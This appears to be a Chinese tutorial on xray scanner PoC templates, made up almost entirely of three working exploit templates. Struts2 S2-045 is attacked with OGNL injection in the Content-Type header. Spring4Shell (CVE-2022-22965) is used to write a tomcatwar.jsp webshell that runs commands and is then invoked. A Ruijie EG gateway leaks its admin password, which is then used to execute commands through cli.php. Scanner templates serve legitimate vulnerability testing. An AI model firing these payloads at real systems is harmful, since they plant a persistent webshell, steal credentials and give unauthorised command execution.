xray-poc-模板

groups

运行多个请求,只要一个存在,则代表漏洞存在

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
name: poc-yaml-struts2_045
set:
  r1: randomInt(800, 1000)
  r2: randomInt(800, 1000)
groups:
  poc1:
    - method: GET
      path: /
      headers:
        Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
      follow_redirects: true
      expression: |
        "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
  poc2:
    - method: GET
      path: /
      headers:
        Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
      follow_redirects: true
      expression: |
        response.body.bcontains(b"struts2_security_check")
detail:
  author: xx
  description: "xx"

最新的模板,rule0、rule1

按照顺序运行rule0、rule1请求,运行第一条请求后等待10s

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
name: poc-yaml-CVE-2022-22965-spring-core-RCE
transport: http
rules:
  rule0:
    expression: response.status == 200
    request:
      method: POST
      path: /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
      headers:
        suffix: '%>//'
        c1: 'Runtime'
        c2: '<%'
        DNT: '1'
        Content-Type: 'application/x-www-form-urlencoded'
  rule1:
    expression: response.status == 200 && response.body.bcontains(b"pwd")&& response.body.bcontains(b"cmd")&& response.body.bcontains(b"getInputStream")
    request:
      method: GET
      path: /tomcatwar.jsp?pwd=j&cmd=whereis%20bash
expression: rule0() && sleep(10) && rule1()
detail:
  author: whale3707
  links:
    - https://github.com/TheGejr/SpringShell
  vulnerability:
    id: CVE-2022-22965-spring-core-RCE

正则表达式

output
search
submatch 关键字搜索body中的字符
搜索的内容存到password
下面用的时候就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
name: poc-yaml-ruijie-eg-cli-rce
manual: true
transport: http
set:
    r1: randomInt(8000, 10000)
    r2: randomInt(8000, 10000)
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /login.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: |
                username=admin&password=admin?show+webmaster+user
        expression: response.status == 200 && response.content_type.contains("text/json")
        output:
            search: '"{\"data\":\".*admin\\s?(?P<password>[^\\\\\"]*)".bsubmatch(response.body)'
            password: search["password"]
    r1:
        request:
            cache: true
            method: POST
            path: /login.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: |
                username=admin&password={{password}}
        expression: response.status == 200 && response.content_type.contains("text/json") && response.headers["Set-Cookie"].contains("user=admin") && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
    r2:
        request:
            cache: true
            method: POST
            path: /cli.php?a=shell
            body: |
                notdelay=true&command=expr {{r1}} * {{r2}}
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0() && r1() && r2()
detail:
    author: Jarcis
    links:
        - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md